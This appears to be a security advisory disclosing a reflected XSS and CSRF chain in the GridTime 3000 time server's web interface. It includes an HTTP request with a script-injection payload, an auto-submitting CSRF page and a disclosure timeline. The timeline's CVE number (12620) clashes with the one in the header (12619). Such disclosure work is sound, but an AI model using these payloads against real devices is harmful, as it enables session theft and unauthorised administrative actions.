Bastion Security

Cross-Site Scripting (XSS) Vulnerability on Several Endpoints by Utilising Cross-Site Request Forgery (CSRF) in GridTime™ 3000 GNSS Time Server - (CVE-2026-12619)

During a security engagement, Leo Diamat discovered that multiple endpoints in the GridTime 3000 GNSS Time Server web application were vulnerable to reflected Cross-Site Scripting (XSS) via an unsanitised token parameter.
Talk to an expert

During a security engagement, Leo Diamat discovered that multiple endpoints in the GridTime 3000 GNSS Time Server web application were vulnerable to reflectedCross-Site Scripting (XSS) via an unsanitised token parameter. Because the affected endpoints lacked Cross-Site Request Forgery (CSRF) protections, the XSS vulnerability could be triggered by tricking a victim into visiting an attacker-controlled page, allowing the attacker to steal an authenticated user's session cookie or perform authenticated actions on their behalf.

This vulnerability affects GridTime 3000 firmware 1.0r0.03 through 1.1r0.0 and was assigned CVE-2026-12619 and has a CVSS score of 5.1 (Medium) (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A).

July 8, 2026

Introduction:

During a security engagement, Leo Diamat discovered that multiple endpoints in theGridTime 3000 GNSS Time Server web application were vulnerable to reflectedCross-Site Scripting (XSS) via an unsanitised token parameter. Because the affected endpoints lacked Cross-Site Request Forgery (CSRF) protections, the XSS vulnerability could be triggered by tricking a victim into visiting an attacker-controlled page, allowing the attacker to steal an authenticated user's session cookie or perform authenticated actions on their behalf.

This vulnerability affects GridTime 3000 firmware 1.0r0.03 through 1.1r0.0 and was assigned CVE-2026-12619 and has a CVSS score of 5.1 (Medium)(CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A).

The Vulnerability:

Multiple endpoints in the GridTime 3000 web application accepted a token parameter that was reflected in the HTTP response without proper sanitisation or output encoding, resulting in reflected Cross-Site Scripting. The following endpoints were found to be affected:

·      POST /

·      POST /net_admin

 

The following request demonstrates the XSS payload being submitted via the token parameter:

POST / HTTP/1.1

Host: 192.168.1.50

User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.9

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 61

Priority: u=0, i

Te: trailers

Connection: keep-alive

 

token=test</script><script>alert(localStorage.token)</script>

The following screenshot shows the HTTP response reflecting the payload unsanitised:

CVE-2026-12619-Reference 1

The following screenshot shows the resulting JavaScript execution in the browser:

Additionally, as these endpoints did not implement Cross-Site Request Forgery (CSRF) protections, the XSS payload could be delivered via a CSRF attack, requiring only that an authenticated victim visit an attacker-controlled web page while able to reach the GridTime 3000 management interface, with no direct interaction with the vulnerable application itself. The following HTML demonstrates a page that automatically submits the XSS payload on load:

<html>

<body>

  <form action="https://192.168.1.50/"method="POST">

    <input type="hidden" name="token"value="test</script><script>alert(localStorage.token)</script>"/>

    <input type="submit" value="Submit request" />

  </form>

  <script>

    history.pushState('', '', '/');

    document.forms[0].submit();

  </script>

</body>

</html>


Impact:

An attacker could craft a malicious web page that, when visited by an authenticated victim with network access to the GridTime 3000 management interface, silently triggers arbitrary JavaScript execution in the context of the device's web application. Because the payload is reflected via a CSRF-unprotected endpoint, only interaction from the victim (visiting the attacker's page) is required, allowing the attacker to steal the victim's session cookie or perform authenticated actions on their behalf, effectively resulting in account takeover or unauthorised administrative actions on the device.

Recommendation

  • Upgrade to firmware release 1.2r0.0 or later, in which this issue has been resolved.

Disclosure Timeline:

  • February 24th, 2026: Issue reported to the GridTime 3000 Security Team (PSIRT)
  • February 25th, 2026: Issue acknowledged and PSIRT-127 assigned
  • June 21st, 2026: CVE-2026-12620 assigned
  • June 21st, 2026: Fix released in firmware 1.2r0.0
  • July 8th 2026: Advisory Live

Service Development Manager
Government Agency
"Great service, clear, detailed and precise information on what our vulnerabilities were and what needs addressing. Couldn't have been easier to deal with and very professional."
Expert methods

We have the tools to pinpoint risks

Whether it’s hidden vulnerabilities or patterns you might miss, we help you stay one step ahead and make confident, informed decisions. Understand how our services can help your business uncover critical risks

Talk to an expert
Employee Cyber Training & Awareness
Your people are your first line of defence. Our cyber training builds awareness and sharpens their instincts.
Advisory
When clarity is critical and stakes are high, our advisory services deliver strategic, executive-level security expertise that empowers decision-making.